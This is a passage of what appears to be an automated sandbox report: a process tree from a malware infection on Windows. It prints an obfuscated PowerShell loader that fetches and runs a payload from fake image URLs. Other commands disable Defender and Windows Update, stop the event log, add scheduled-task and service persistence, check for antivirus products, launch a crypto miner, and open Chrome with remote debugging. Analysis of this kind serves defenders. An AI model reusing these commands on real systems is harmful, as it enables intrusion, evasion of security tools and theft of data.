        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@GQ@ZwBk@Gs@SQBk@H@@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FY@YgBj@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.dgdkIdp/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7640
- - C:\Users\Admin\AppData\Local\Temp\a\con12312211221.exe
    "C:\Users\Admin\AppData\Local\Temp\a\con12312211221.exe"
    3⤵
    PID:7840
  - - C:\Users\Admin\AppData\Local\Temp\a\con12312211221.exe
      "C:\Users\Admin\AppData\Local\Temp\a\con12312211221.exe"
      4⤵
      PID:632
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7840 -s 840
      4⤵
      Program crash
      PID:7120
- - C:\Users\Admin\AppData\Local\Temp\a\done12312.exe
    "C:\Users\Admin\AppData\Local\Temp\a\done12312.exe"
    3⤵
    PID:1988
  - - C:\Users\Admin\AppData\Local\Temp\a\done12312.exe
      "C:\Users\Admin\AppData\Local\Temp\a\done12312.exe"
      4⤵
      PID:7860
  - - C:\Users\Admin\AppData\Local\Temp\a\done12312.exe
      "C:\Users\Admin\AppData\Local\Temp\a\done12312.exe"
      4⤵
      PID:7248
  - - C:\Users\Admin\AppData\Local\Temp\a\done12312.exe
      "C:\Users\Admin\AppData\Local\Temp\a\done12312.exe"
      4⤵
      PID:8124
  - - C:\Users\Admin\AppData\Local\Temp\a\done12312.exe
      "C:\Users\Admin\AppData\Local\Temp\a\done12312.exe"
      4⤵
      PID:4268
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "done12312" /tr "C:\Users\Admin\AppData\Roaming\done12312.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5056
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 844
      4⤵
      Program crash
      PID:7544
- - C:\Users\Admin\AppData\Local\Temp\a\12321321.exe
    "C:\Users\Admin\AppData\Local\Temp\a\12321321.exe"
    3⤵
    PID:6340
- - C:\Users\Admin\AppData\Local\Temp\a\alex111111.exe
    "C:\Users\Admin\AppData\Local\Temp\a\alex111111.exe"
    3⤵
    PID:7428
  - - C:\Users\Admin\AppData\Local\Temp\a\alex111111.exe
      "C:\Users\Admin\AppData\Local\Temp\a\alex111111.exe"
      4⤵
      PID:8164
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 836
      4⤵
      Program crash
      PID:6492
- - C:\Users\Admin\AppData\Local\Temp\a\valorant_ESP_aimbot.exe
    "C:\Users\Admin\AppData\Local\Temp\a\valorant_ESP_aimbot.exe"
    3⤵
    PID:7120
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winservice" /tr "C:\Users\Admin\AppData\Local\Temp\winservice.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5612
- - C:\Users\Admin\AppData\Local\Temp\a\MetaTrader.exe
    "C:\Users\Admin\AppData\Local\Temp\a\MetaTrader.exe"
    3⤵
    PID:3384
- - C:\Users\Admin\AppData\Local\Temp\a\WindowsAutHost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\WindowsAutHost.exe"
    3⤵
    PID:3756
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1216
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5368
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:7964
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:8016
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:4796
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:3572
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:7356
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:8164
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:2972
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:2720
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:3628
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:5924
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WindowsAutHost"
      4⤵
      Launches sc.exe
      PID:7564
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"
      4⤵
      Launches sc.exe
      PID:4684
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:7328
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WindowsAutHost"
      4⤵
      Launches sc.exe
      PID:1820
- - C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
    "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
    3⤵
    PID:8940
- - C:\Users\Admin\AppData\Local\Temp\a\test.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
    3⤵
    PID:9020
  - - C:\Windows\Temp\putty.exe
      "C:\Windows\Temp\putty.exe"
      4⤵
      PID:1236
    - - C:\Users\Admin\AppData\Local\Temp\7zS4D474009\setup-stub.exe
        
        .\setup-stub.exe
        5⤵
        
        PID:2120
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 2188
        6⤵
        Program crash
        
        PID:7608
- - C:\Users\Admin\AppData\Local\Temp\a\widsmob_denoise_win.exe
    "C:\Users\Admin\AppData\Local\Temp\a\widsmob_denoise_win.exe"
    3⤵
    PID:7244
- - C:\Users\Admin\AppData\Local\Temp\a\HmngBpR.exe
    "C:\Users\Admin\AppData\Local\Temp\a\HmngBpR.exe"
    3⤵
    PID:8084
  - - C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
      C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
      4⤵
      PID:8212
    - - C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
        
        C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
        5⤵
        
        PID:9068
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        
        PID:9160
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        7⤵
        
        PID:7284
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 1184
        8⤵
        Program crash
        
        PID:4076
- - C:\Users\Admin\AppData\Local\Temp\a\ADFoyxP.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ADFoyxP.exe"
    3⤵
    PID:7176
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
      4⤵
      PID:3752
    - - C:\Windows\SysWOW64\expand.exe
        
        expand Go.pub Go.pub.bat
        5⤵
        
        PID:3520
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:556
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        
        PID:7292
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:7124
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
        5⤵
        
        PID:3588
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 353090
        5⤵
        
        PID:5812
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Really.pub
        5⤵
        
        PID:5220
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "posted" Good
        5⤵
        
        PID:3508
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
        5⤵
        
        PID:5020
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
        5⤵
        
        PID:4716
    - - C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
        
        Seat.com m
        5⤵
        
        PID:680
      - C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
        6⤵
        
        PID:13120
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 13120 -s 1392
        7⤵
        Program crash
        
        PID:8224
      - C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
        6⤵
        
        PID:7588
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        
        PID:12908
- - C:\Users\Admin\AppData\Local\Temp\a\random.exe
    "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
    3⤵
    PID:8936
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8936 -s 1120
      4⤵
      Program crash
      PID:11880
- - C:\Users\Admin\AppData\Local\Temp\a\V4VHskG.exe
    "C:\Users\Admin\AppData\Local\Temp\a\V4VHskG.exe"
    3⤵
    PID:7596
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "V4VHskG" /tr "C:\Users\Admin\AppData\Roaming\V4VHskG.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:8676
- - C:\Users\Admin\AppData\Local\Temp\a\JqGBbm7.exe
    "C:\Users\Admin\AppData\Local\Temp\a\JqGBbm7.exe"
    3⤵
    PID:5888
- - C:\Users\Admin\AppData\Local\Temp\a\hf9tYzF.exe
    "C:\Users\Admin\AppData\Local\Temp\a\hf9tYzF.exe"
    3⤵
    PID:8868
- - C:\Users\Admin\AppData\Local\Temp\a\GHpWbrQ.exe
    "C:\Users\Admin\AppData\Local\Temp\a\GHpWbrQ.exe"
    3⤵
    PID:5568
  - - C:\Users\Admin\AppData\Local\Temp\a\GHpWbrQ.exe
      "C:\Users\Admin\AppData\Local\Temp\a\GHpWbrQ.exe"
      4⤵
      PID:6008
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5568 -s 840
      4⤵
      Program crash
      PID:7976
- - C:\Users\Admin\AppData\Local\Temp\a\zXJK5mk.exe
    "C:\Users\Admin\AppData\Local\Temp\a\zXJK5mk.exe"
    3⤵
    PID:9172
  - - C:\Users\Admin\AppData\Local\Temp\a\zXJK5mk.exe
      "C:\Users\Admin\AppData\Local\Temp\a\zXJK5mk.exe"
      4⤵
      PID:7320
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9172 -s 808
      4⤵
      Program crash
      PID:7088
- - C:\Users\Admin\AppData\Local\Temp\a\wBalaPT.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wBalaPT.exe"
    3⤵
    PID:2428
  - - C:\Users\Admin\AppData\Local\Temp\a\wBalaPT.exe
      "C:\Users\Admin\AppData\Local\Temp\a\wBalaPT.exe"
      4⤵
      PID:4616
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 836
      4⤵
      Program crash
      PID:7828
- - C:\Users\Admin\AppData\Local\Temp\a\zY9sqWs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\zY9sqWs.exe"
    3⤵
    PID:5316
  - - C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
      4⤵
      PID:1948
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5084
    - - C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\Bthvgkck.exe"
        5⤵
        
        PID:2016
- - C:\Users\Admin\AppData\Local\Temp\a\v6Oqdnc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\v6Oqdnc.exe"
    3⤵
    PID:7268
- - C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
    3⤵
    PID:4320
- - C:\Users\Admin\AppData\Local\Temp\a\server.exe
    "C:\Users\Admin\AppData\Local\Temp\a\server.exe"
    3⤵
    PID:3956
- - C:\Users\Admin\AppData\Local\Temp\a\3601_2042.exe
    "C:\Users\Admin\AppData\Local\Temp\a\3601_2042.exe"
    3⤵
    PID:1216
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
      4⤵
      PID:8612
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 512
      4⤵
      Program crash
      PID:9560
- - C:\Users\Admin\AppData\Local\Temp\a\8998_3800.exe
    "C:\Users\Admin\AppData\Local\Temp\a\8998_3800.exe"
    3⤵
    PID:4064
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
      4⤵
      PID:11424
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4064 -s 492
      4⤵
      Program crash
      PID:12300
- - C:\Users\Admin\AppData\Local\Temp\a\mAtJWNv.exe
    "C:\Users\Admin\AppData\Local\Temp\a\mAtJWNv.exe"
    3⤵
    PID:2120
  - - C:\Users\Admin\AppData\Local\Temp\a\mAtJWNv.exe
      "C:\Users\Admin\AppData\Local\Temp\a\mAtJWNv.exe"
      4⤵
      PID:8544
  - - C:\Users\Admin\AppData\Local\Temp\a\mAtJWNv.exe
      "C:\Users\Admin\AppData\Local\Temp\a\mAtJWNv.exe"
      4⤵
      PID:4596
  - - C:\Users\Admin\AppData\Local\Temp\a\mAtJWNv.exe
      "C:\Users\Admin\AppData\Local\Temp\a\mAtJWNv.exe"
      4⤵
      PID:6544
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:12096
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
